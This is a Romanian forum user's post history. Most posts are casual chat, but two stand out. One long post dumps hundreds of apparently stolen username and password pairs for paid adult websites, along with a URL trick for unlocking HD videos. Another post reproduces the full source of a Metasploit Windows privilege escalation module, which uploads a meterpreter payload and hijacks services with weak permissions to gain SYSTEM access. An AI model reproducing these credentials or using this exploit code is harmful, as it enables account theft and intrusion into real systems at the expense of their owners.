LLegoLLaS
-
Posts
2060 -
Joined
-
Last visited
-
Days Won
11
Posts posted by LLegoLLaS
-
-
Ar merge un tricou.La event probabil nu pot ajunge
-
Impresarii pulii mele!
Auzi la ce nesimtire, ei sunt impresarii tuturor sfintilor, dale-as muie si lor si familiilor lor de grasi slinosi si spurcati ce sunt!
e caterinca
-
vezi allview.Is modele proprii si nu-s foarte rele
-
n-am priceput de ce e vazut ca erou kim dotsunca asta cand pentru 100kB/s in plus tre' sa-i dai sa-si ia cl63.Nu zic ca tre sa moara,bravo lui ca a facut site-u ala dar nici sa-l pupati in cur.I-a mers,i-a picat.Altu' la rand cu alte idei.
-
contul meu s-a dus la r3flux (nr 740)
edit: greseala,trebuia postat in topicul cu Tranceroute
-
propun sa alegi 2 numere, ofer si eu un cont.
-
-
si anume care EROI (nu jucatori)?.Un SS ceva.Oricum 10 E e mult
-
Haide frate ca nu se compara.... come1.. Brazzers sau Vivid cu Redtube/Tube8... Sa fim seriosi.. te uiti la un Hd .. ai impresia ca o f*** tu pe aia
i still remember that post
-
http://members2.mofos.com/members/login/
sux40230:121314
quique:designer2
gustavus:ipswich
http://diabolic.com/authindex.php?
cbeveridge:Tvfh1989
Dobermann:Zoltan
http://brutalfisting.com
restrada6626:estrada6626
Rotblonder:Rotblond
http://members.3dxstar.com/access/login
polgart:russel
markot:marina
http://members.twistys.com/home/
telchar:london
andreloomis:josie
cybdem:rei669
http://www.ten.com/signin
1tenten:j1111111
1roller:ryomyO
http://socalsexpass.com/members/
lindsayaaf:gill1love
mingkwan:hm251165
tyrekeev:damonhar
diegorski:bukowski
http://members.gfrevenge.com/?a=videos.view.hd&id=9577
adrrda:adrrdatylote
doggers:hoggers
http://members.realitykings.com/?a=update.movie.mp4&site=milfhunter&id=9583
wigonp989:AF4PANHZ
tuamewf5856:mausofv3489
cf2513:vinson
jloric:brothers
skydstofte:rindum
12345:123456
nomin:130376
rowme:rowmed
http://plus.playboy.com/auth/login
lachatte:cyprine
corrie:1yobro
fast2208:runner217
vinovino:vinosel
http://members.hornybirds.com/?a=videos.view.hd&id=8700
yusiyzi464:veekh42
spalermo:middle
http://mobile.realitykings.com/user/login/?
beerwrench:dillon01
mvl9924a:rap9912a
jagger10:tiebow10
blackhea:24443kr
bhillier3:snooose
ashleighriot:zero5000
pi27366:kidimi
http://members.18andabused.videosz.com
dcsmith:medhist
jasonfun:jason6969
scotty55:637647
http://ma.brazzers.com/
tomlong:bigdog4
chefjon1039:ox11dw
http://members.babes.com/access/login
VetteDude1964:Sailing1
benvil:ismael
vladznik:mb320ml
jackmack15:stumps
jkmoore38:modiddy13
http://boobiesz.videosz.com/members.php?s=19396|13133|1988|15|wide|0&lg=us
bader1010:maha1010
http://m.mofos.com
Billy3c:Triple3c
1987montreal:1987montreal
just2hunt4:Iwbizah01
just2hunt4:Iwbizah01
jaymanguy:jayguy16
scohub3:baseball3
Billy3c:Triple3c
1987montreal:1987montreal
lando23:warheart23
comby321:booker456
martyyyy:phenmarr
bbrave25:goblue
bilbo3p1:wizard68
codjamet:thomas01
otter74:panther74
otrebor93:bruce93
http://m.digitalplayground.com/
devilred:juju1212
http://www.ilovelupe.com/pages/login
yxWQRRdf:sWguAkbT
YGCyNVwS:ScvU4Jzf
http://www.joymii.com/
jowtothe : 2orld55
fast2208:runner217
caiser:bullsara
http://ipad.realitykings.com/member/scenes/?id=9443
dornbrian@yahoo.com:SUPERMAN
dookie24:000149
dominic100:hougham100
ebeck0311: Deaddog1
elrod00:dog123
emiem1977:emiemaou
eu108768:ncn9CDs
ffs88269:914455fr
farmer333@aol.com:cp123456
fjbjr3747:kat3747
http://members.gfrevenge.com/?a=videos.view.hd&id=9472
xxorilf4911:AC85TDAG
http://www.brasileirinhas.com.br/login.php
shakal.f@hotmail.com:33091000
jinostroza08@gmail.com:jail1088
stefabi87@yahoo.com:berseejker87
http://treachdj:shabazz@members.mobile.bangbrosnetwork.com/
http://darinjp:chinook@members.mobile.bangbrosnetwork.com/
http://jbagels:alberto@members.mobile.bangbrosnetwork.com/
http://sb67j.members.twistyshard.com/cgi-bin/sblogin/handoff2.cgi?site=sb67j.members.twistyshard.com
http://ma.brazzers.com/
jordan258:brazjordanash
tomlong:bigdog4
chefjon1039:ox11dw
http://members.eurofoxes.com/
gromittd:redwiaeu
nendelsp:sezam4hn
http://m.digitalplayground.com/
devilred:juju1212
http://euroteensluts.com
arledge:arledge332
tendoy:tendoy
http://m.mofos.com
Billy3c:Triple3c
1987montreal:1987montreal
just2hunt4:Iwbizah01
http://diabolic.com/
HITTMANN1:SHARPSH00TER
D03Mc25B67:J07D20M65
http://members.allelitepass.com/sites/emoteensluts/
tissanum:mickey
dio333:oid111
http://members.8teensworld.com/
ericb21:shoefly
steelartun:steelart
zicktgn:19sHaDow
http://members.euro-pornstars.com/login.php
nitesh:mojo23x1
asolow:b5voaiex
http://v2.meatmembers.com/
mutad1:request7
pussy1:pussy2
http://www.ten.com/index
rockligh:happy123
23o3sdf23:234234
http://www.britishcenterfolds.com/members/
ArkngL:mpxteam
777happy11:11sad777
Trig27:Stacey20
Playboy
http://plus.playboy.com/auth/login
belsebob:slasher
Twistys
http://members.twistys.com
depauw1:tt24721
SexArt
http://members.sexart.com/members/
ameena555:6062023
http://members.babes.com/access/login
VetteDude1964:Sailing1
benvil:ismael
Femjoy.com
wiyd21:mose57
qwe789:asd456
chetall1:msnbc356
thor05:stabilob
http://www.joymii.com/
jowtothe:2orld55
fast2208:runner217
caiser:bullsara
http://boobiesz.videosz.com/members.php?s=19396|13133|1988|15|wide|0&lg=us
bader1010:maha1010
http://members.realitykings.com/?a=update.movie.mp4&site=milfhunter&id=9583
wigonp989:AF4PANHZ
tuamewf5856:mausofv3489
cf2513:vinson
jloric:brothers
skydstofte:rindum
12345:123456
nomin:130376
rowme:rowmed
http://members.gfrevenge.com/?a=videos.view.hd&id=9577
adrrda:adrrdatylote
doggers:hoggers
http://members.hornybirds.com/?a=videos.view.hd&id=8700
yusiyzi464:veekh42
spalermo:middle
if you want to watch a video you must add ".hd" to the url
http://members.hornybirds.com/?a=videos.view&id=8949
example
http://members.hornybirds.com/?a=videos.view.hd&id=8949
http://mrfix123:mrfix321@members.mrbigdickshotchicks.com/
http://violet:twisted@members.mrbigdickshotchicks.com/
http://123456:654321@members.mrbigdickshotchicks.com/
http://shtenba:bellaboo@www.realitymembers.com/refer/mas/members/youngwildgirls/
http://compliance:compliance@www.realitymembers.com/refer/mas/members/youngwildgirls/
http://treachdj:shabazz@members.mobile.bangbrosnetwork.com/
http://darinjp:chinook@members.mobile.bangbrosnetwork.com/
http://jbagels:alberto@members.mobile.bangbrosnetwork.com/
http://robjohn5:tatenbau@hotbody.com/members/mem_index.htm
http://badpoet78:badpoet1@hotbody.com/members/mem_index.htm
http://theone2006:ManChan2@hotbody.com/members/mem_index.htm
http://ma.brazzers.com/access/login
Hatchling0001:alpha01
ostin987:179328
bradedge:122012
faulbaush:bernie
chefjon1039:ox11dw
jmgalvan:w09081953
http://members2.mofos.com/members/
bevila12:a083142
bill2222:teps8377
kavzheng:283888
http://members.twistys.com/home/
telchar:london
andreloomis:josie
cybdem:rei669
http://ipad.daredorm.com/member/scenes/
nrat904:bandit904
legerc:crw884
vmkjimbo:password
http://m.wickedpictures.com/user/login
hanhtest:hanhtest1
manxonia:d247134p
http://members.18andabused.videosz.com
dcsmith:medhist
jasonfun:jason6969
http://mobile.realitykings.com/user/login/?
mikewolf:6666flow
anaryagug94:lumsfg41
http://mobile.gfrevenge.com/
fast2208:runner217
Mogelmo:1108Imke
http://mobile.daredorm.com
jesiwvu624:diuzq55
jerikyo495:woecf98
http://hdmovieclub.com/login
mron0210:ronman
markshack:katlyn
loewe80:marlboro
http://teachmyass.com/
demo88:qwert123
jackson50:gocougs
Michele1967:festaa
http://members.naughtyamerica.com/
Tster:Brits1
peterat:9395lana
vaughnross:vr1234
http://ma.brazzers.com/
chefjon1039:ox11dw
faulbaush:bernie
firmamic:miclarsen
http://members.realitykings.com/?a=update.movie.HD&site=monstercurves&id=9581
bentham:coinco02
mogelmo:1108imke
http://member.cleanmyass.com/
dbetney:baldrick
henning:ap061163
gjktpyfz:ghjcnjrd
http://paradism:dental@www.emmashotgirls.com/members/index.html
http://chtest:cht3st@www.emmashotgirls.com/members/gallery.html
http://Sandmann:ishere2@www.emmashotgirls.com/members/gallery.html
http://treachdj:shabazz@members.mobile.bangbrosnetwork.com/
http://kdimke:boozer@members.mobile.bangbrosnetwork.com/
http://jbagels:alberto@members.mobile.bangbrosnetwork.com/
http://ma.brazzers.com/
chefjon1039:ox11dw
faulbaush:bernie
firmamic:miclarsen
http://m.mofos.com
Billy3c:Triple3c
1987montreal:1987montreal
just2hunt4:Iwbizah01
http://members.allrealitypass.com/
pablo5:gta123
123456:654321
http://v2.meatmembers.com/
pbozzz:cielo11
shecky:olympia
sherodh:297ram
http://members.18andabused.videosz.com
dcsmith:medhist
jasonfun:jason6969
http://m.mofos.com
Billy3c:Triple3c
1987montreal:1987montreal
just2hunt4:Iwbizah01
http://diabolic.com/authindex.php
giddo64:genius1
china55:marzar55
crashgordo:rab5691
http://plus.playboy.com/auth/login
lachatte:cyprine
corrie:1yobro
fast2208:runner217
vinovino:vinosel
gordolee85:mac2olli
http://Joymii.com
ManuelB:eumesmo
ponzini:guidop
iltfr1:tfritb
members.pornpros.com
Yatesa:Yatesa1
snake32:silver34
magaro:marlboro
bohdidog:roadking
mijogre:groovy
chappy:chap22
sirdrake:siris123
vonster:monsters
alejandro123:perejil
kent001:marlboro
shadow85:rodrigo
tkchris68:wizard
willshearer:jkzfy46t
MBRINS:12345678
silvio:silvio83
moustafam:mosees
artjohn:88888888
capfininv:harvard01
ms1960:xm02114
mothner:moth1201
SAFulkerson:apeblue62
denfinaskon:halmstad23
tonym11:montana1104
jamesblanch:winston
odeeps:bolia1
http://members.daredorm.com/
11fullilleo:juuks19
asad786:hotmail
erlohs:holres
guevl73:foumz78
janmomo5:Luzi2005
http://members.twistys.com/access/login
raymon18:popqwq
alehandre:lestat
pellets1:sassy1
altopelirrojo:donquijote
telchar:london
malkit123:singh123
andreloomis:josie
http://ma.brazzers.com/
hamlet:ophelia
doobydon:buffy55
spirox:aegis63
sammy2336:MS02891
slothcbr:cbrsloth
skachru:erjkb122
spirox:aegis63
atari101:access
banu007:bouboule
cashley:metalgod
pee.air@gmail.com:canucks
abuuuh:12345676
neoshadow22:vaio23
doberm:crowed
Pat4998:sevenc
bigup2:fish13
walterok:unicorn
merckx:peoria
rons35:stew35
http://members.18andabused.videosz.com
scotty55:637647
http://members.babes.com/access/login
VetteDude1964:Sailing1
Femjoy.com
wiyd21:mose57
qwe789:asd456
chetall1:msnbc356
thor05:stabilob
http://members.babes.com/home/
vladznik:mb320ml
jackmack15:stumps
jkmoore38:modiddy13
http://barely18barbie.com/members/
mk2112:s8pjan3l
henry88:el3ctric
http://www.hotvirgin-nextdoor.com/members/
avit:xpress
sacrif:innuend0
http://member.teenanalcasting.com/login.html?url=/
ppm5232:77814949
Sandwiche:ficker
mahaney:mustang
http://www.nikkipark.com/members/
2900tosh : 3846tosh
AgentX : just4me
http://members.teenpornopass.com/sblogin/login.shtml/
Cpennynj:1penny
uyp58l:twins87
nudesrp:djfu745
Brando234:ireland
http://member.doubleteamedteens.com/
bdavey:bigbad
tonton1980:blunts
triumph:cbr900ff
http://www.ilovelupe.com/pages/login
yxWQRRdf:sWguAkbT
YGCyNVwS:ScvU4Jzf
http://litefoot:pandora@www.m-u-s-e.org/members/index.php
http://dwayne:beautyma@www.m-u-s-e.org/members/index.php
http://costina:verdino@www.myteenmaid.com/members/
http://julofra:844cvu@www.myteenmaid.com/members/
http://maximim:gibson@www.myteenmaid.com/members/
http://nicpaycom:nictest2@www.myteenmaid.com/members/
http://interwoo:1f0dase@bikini-heat.com/area51/
http://pppppppp:gggggggg@bikini-heat.com/area51/
http://rosabora:livevw03@bikini-heat.com/area51/
http://members.realitykings.com/?a=update.movie.HD&site=monstercurves&id=9581
bentham:coinco02
mogelmo:1108imke
if you want to watch a video you must add ".hd" to the url
http://members.realitykings.com/?a=update.movie&site=monstercurves&id=9437
example
http://members.realitykings.com/?a=update.movie.hd&site=monstercurves&id=9437
http://members.gfrevenge.com/?a=update.view.HD&id=9558
adrrda:adrrdatylote
ezp123:soundcrafter
if you want to watch a video you must add ".hd" to the url
http://members.gfrevenge.com/?a=videos.view&id=9439
example
http://members.gfrevenge.com/?a=videos.view.hd&id=9439
http://members.fetish360.com/members/
spitfire:minka666
jmil10014:thomas01
http://brasileirinhas.com.br/login.php
jinostroza08@gmail.com:jail1088
stefabi87@yahoo.com:berseejker87
http://member.assteenmouth.com/login.html?url=/
Rudnickip:Kc4ys7tA
johnjones:alsk10
soothsay00:aubrey
http://www.realhomemovies.com/members/
luv2lick:fatboy04
deimos6:0107luz
http://ipad.realitykings.com/member/scenes/?id=9443
kocopwo775:cuehv67
kiherti682:ziiqm57
http://members.allelitepass.com/
blitzr:redbuns
surfndez:serenity
hillvagt:susimaus
http://members.asiamoviepass.com
jimesti:tomson
http://members.gfrevenge.com/?a=videos.view.hd&id=9472
xxorilf4911:AC85TDAG
http://m.digitalplayground.com/
devilred:juju1212
http://members2.mofos.com/
afrodork:porsche3
kmarden:lunch31
http://socalsexpass.com/members/
lindsayaaf:gill1love
mingkwan:hm251165
tyrekeev:damonhar
diegorski:bukowski
http://member.teachmyass.com/login.html?url=/
chatenpatel:ilikeato
chris469:satyr469
deefiw69:piglet12
dfmlorch:hii69bye
http://www.ten.com/signin
1tenten:j1111111
1roller:ryomyO
http://ma.brazzers.com
tomlong:bigdog4
brent760:jeff760
kspscsc:alitasi
shotgunfire5:dodge504
dumper:bigguy
boozer:479066
Matsukishi:emootron
harvill:laalaa
merckx:peoria
thedbert21:herbert
doobydon:buffy55
razzabasket@yahoo.it:77johnny
sammy2336:MS02891
slothcbr:cbrsloth
skachru:erjkb122
spirox:aegis63
atari101:access
banu007:bouboule
cashley:metalgod
pee.air@gmail.com:canucks
abuuuh:12345676
neoshadow22:vaio23
doberm:crowed
Pat4998:sevenc
bigup2:fish13
walterok:unicorn
merckx:peoria
rons35:stew35
http://memberall.tryteens.com/login.html?url=/
ham1234:wl421fmw
ppm5232:77814949
cakemikz:blind1
jjb109:zxc456
http://www.upskirtcollection.com/
preach13:matrix13
5435bk:fuckface
binimeko:hajns170483
http://ps3.brazzers.com/hdmembers/
Barry00: Straw00
mikeqts:sifo2006
kellepc:lakers32
thrasher22:ibanez7
goody51184:monster511
lintzz2:2hip4u
schmidi:swordfish
Johnney:Backwards
lehmo9:vandoren
Clinagen:baseball1
mustin:gunner89
http://members.realitykings.com/?a=update.movie.hd&site=roundandbrown&id=9571
bentham:coinco02
mogelmo:1108imke
if you want to watch a video you must add ".hd" to the url
http://members.realitykings.com/?a=update.movie&site=monstercurves&id=9437
example
http://members.realitykings.com/?a=update.movie.hd&site=monstercurves&id=9437
and now can see all the videos
http://errain:dakota42@members.youngerpornstars.com/
http://jackhead:69698992@members.youngerpornstars.com/
http://epochtt:epochtest@members.youngerpornstars.com
http://tbp_review:access_t@members.youngerpornstars.com/
http://rosemound:daphne@members.mobile.bangbrosnetwork.com/
http://silly3:horny3@members.mobile.bangbrosnetwork.com/
http://ma.brazzers.com
tomlong:bigdog4
abuuuh:12345676
neoshadow22:vaio23
doberm:crowed
Pat4998:sevenc
bigup2:fish13
walterok:unicorn
merckx:peoria
rons35:stew35
slothcbr:cbrsloth
skachru:erjkb122
spirox:aegis63
atari101:access
banu007:bouboule
cashley:metalgod
pee.air@gmail.com:canucks
http://ps3.brazzers.com/hdmembers/
brian211982:always82
Clinagen:baseball1
mustin:gunner89
http://members.realitykings.com/?a=update.movie.hd&site=pure18&id=9480
cf2513:vinson
jloric:brothers
skydstofte:rindum
12345:123456
nomin:130376
rowme:rowmed
http://plus.playboy.com/auth/login
belsebob:slasher
http://members.twistys.com/access/login
luigigb1:snoopy111
poisonrob:mad1981
boadaseb:woooha
http://members.mitzas.com
Smokey05:Julius80
pornpass:paradise
touchmetinman
sgtyork12gungho
http://members.18andabused.videosz.com
scotty55:637647
http://xtsy.com/
amatur_4x:ru2fast
dentldir:TenW0nga
http://members.babes.com/access/login
VetteDude1964:Sailing1sa fie primit celui de-al 1674-lea post al meu
-
Il vinzi?
-
2 euro paypal (minimc 250 posturi pe forum)/vodafone/cosmote
-
explica ce vrei sa faca.De obicei....telefonu' primeste mesaje.Il poti conecta la pc si sa manageriezi mesajele prin software suite oferit de producator
-
-
interesat de harddsik,astept pm/reply cu pret
-
n-ai cum frate,n-ai cum.
-
de foarte multe ori pirateria duce la o expunere mult mai mare si la mai multi cumparatori nicidecum la gauri in profit.Nu ma refer la noi,noi abia cumparam un cd original cu muzica buna.In schimb sponsorizam filialele de cersetori si cutia milei din biserici (bani care merg spre mercedesuri cu numere preferentiale BOR,pe noi si noi biserici,pe noi si noi cutii ale milei).De asemenea, de multe ori, daca nu erau torrente, ne luam mari tepe de la producatori cu jocuri si filme de doi bani arhilaudate.
-
Shut the fuck up and take my money!
in special pt scanare
-
tre' sa fii prea bun sa copiezi la un prof care nu te lasa.Ori daca esti atat de bun,mai bine pune-ti capul si invata:mecanicin cazul in care e un cacat de materie,logic daca iti place.Ce a facut baiatu' ala il vad ca pe un "testing purposes''.
-
daca ar fi sa comentam ''la obiect'' as putea spune ca motorasul ala e cam galagios.Daca chiar vrei ceva slim,usor de manevrat si fara sa fii ciudatul clasei scriind cu pix cu manciclon in cap (
), mai bine iti scrii ce iti trebuie cu solutie vizibila la raze uv iar la apsarea unui buton sa aprinzi un led sau ceva care sa lumineze hartia.BTW daca te benoclezi indeajuns se vede si cu ochiul liber -
ce penar da' ceva cu proiectie pe retina pe cand ma baiatu ?
In timpul cat sa chinuit sa construiasca strutocamila aia, isi invata lectiile si macar ramanea cu ceva in cap
refuz sa cred ca baiatu' ala e un ratat care nu invata nimic la scoala si nu stie ce vrea de la viata lui din moment ce a reusit sa gandeasca o jucarie de genu'.Din 30 sec cat am vazut eu probabil a folosit placuta unei masinute cu telecomanda,ceea ce nu e foarte greu,dar nici usor!
-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/post/windows/services'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::Windows::WindowsServices
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Escalate Service Permissions Local Privilege Escalation',
'Description' => %q{
This module attempts to exploit existing administrative privileges to obtain
a SYSTEM session. If directly creating a service fails, this module will inspect
existing services to look for insecure file or configuration permissions that may
be hijacked. It will then attempt to restart the replaced service to run the
payload. This will result in a new session when this succeeds. If the module is
able to modify the service but does not have permission to start and stop the
affected service, the attacker must wait for the system to restart before a
session will be created.
},
'License' => MSF_LICENSE,
'Author' => [ 'scriptjunkie' ],
'Arch' => [ ARCH_X86 ],
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => '5'
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0
))
register_options([
OptBool.new("AGGRESSIVE", [ false, "Exploit as many services as possible (dangerous)", false ])
])
end
def exploit
# randomize the filename
filename= Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
# randomize the exe name
tempexe_name = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
raw = payload.encoded
exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
sysdir = session.fs.file.expand_path("%SystemRoot%")
tmpdir = session.fs.file.expand_path("%TEMP%")
print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
begin
#
# Upload the payload to the filesystem
#
tempexe = tmpdir + "\\" + tempexe_name
fd = session.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
rescue ::Exception => e
print_error("Error uploading file #{filename}: #{e.class} #{e}")
return
end
#attempt to make new service
#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
print_status("Trying to add a new service...")
adv = session.railgun.advapi32
manag = adv.OpenSCManagerA(nil,nil,0x10013)
if(manag["return"] != 0)
# SC_MANAGER_CREATE_SERVICE = 0x0002
# SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
# SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
newservice = adv.CreateServiceA(manag["return"],Rex::Text.rand_text_alpha((rand(8)+6)),
"",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
if(newservice["return"] != 0)
print_status("Created service... #{newservice["return"]}")
ret = adv.StartServiceA(newservice["return"], 0, nil)
print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
adv.DeleteService(newservice["return"])
adv.CloseServiceHandle(newservice["return"])
if datastore['AGGRESSIVE'] != true
adv.CloseServiceHandle(manag["return"])
return
end
else
print_error("Uhoh. service creation failed, but we should have the permissions. :-(")
end
else
print_status("No privs to create a service...")
manag = adv.OpenSCManagerA(nil,nil,1)
if(manag["return"] == 0)
print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
end
end
print_status("Trying to find weak permissions in existing services..")
#Search through list of services to find weak permissions, whether file or config
serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
#for each service
service_list.each do |serv|
begin
srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
if srvtype != "16"
continue
end
moved = false
configed = false
#default path, but there should be an ImagePath registry key
source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
#get path to exe; parse out quotes and arguments
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
sourcemaybe = session.fs.file.expand_path(sourceorig)
if( sourcemaybe[0] == '"' )
sourcemaybe = sourcemaybe.split('"')[1]
else
sourcemaybe = sourcemaybe.split(' ')[0]
end
begin
session.fs.file.stat(sourcemaybe) #check if it really exists
source = sourcemaybe
rescue
print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
end
#try to exploit weak file permissions
if(source != tempexe && session.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
session.railgun.kernel32.CopyFileA(tempexe, source, false)
print_status("#{serv} has weak file permissions - #{source} moved to #{source+'.bak'} and replaced.")
moved = true
end
#try to exploit weak config permissions
#open with SERVICE_CHANGE_CONFIG (0x0002)
servhandleret = adv.OpenServiceA(manag["return"],serv,2)
if(servhandleret["return"] != 0)
#SERVICE_NO_CHANGE is 0xFFFFFFFF
if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,
0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
configed = true
end
adv.CloseServiceHandle(servhandleret["return"])
end
if(moved != true && configed != true)
print_status("No exploitable weak permissions found on #{serv}")
continue
end
print_status("Restarting #{serv}")
#open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
if(servhandleret["return"] != 0)
#SERVICE_CONTROL_STOP = 0x00000001
if(adv.ControlService(servhandleret["return"],1,56))
session.railgun.kernel32.Sleep(1000)
adv.StartServiceA(servhandleret["return"],0,nil)
print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
#Cleanup
if moved == true
session.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
end
if configed == true
servhandleret = adv.OpenServiceA(manag["return"],serv,2)
adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,
0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
adv.CloseServiceHandle(servhandleret["return"])
end
else
print_status("Could not restart #{serv}. Wait for a reboot or force one yourself.")
end
adv.CloseServiceHandle(servhandleret["return"])
if datastore['AGGRESSIVE'] != true
return
end
else
print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
end
rescue
end
end
end
endsursa:bugsearch
-
wipe free space
cu ccleaner (dupa delete) -
Microsoft Office Excel 2007 WriteAV Crash PoC
in Exploituri
Posted
sursa:bugsearch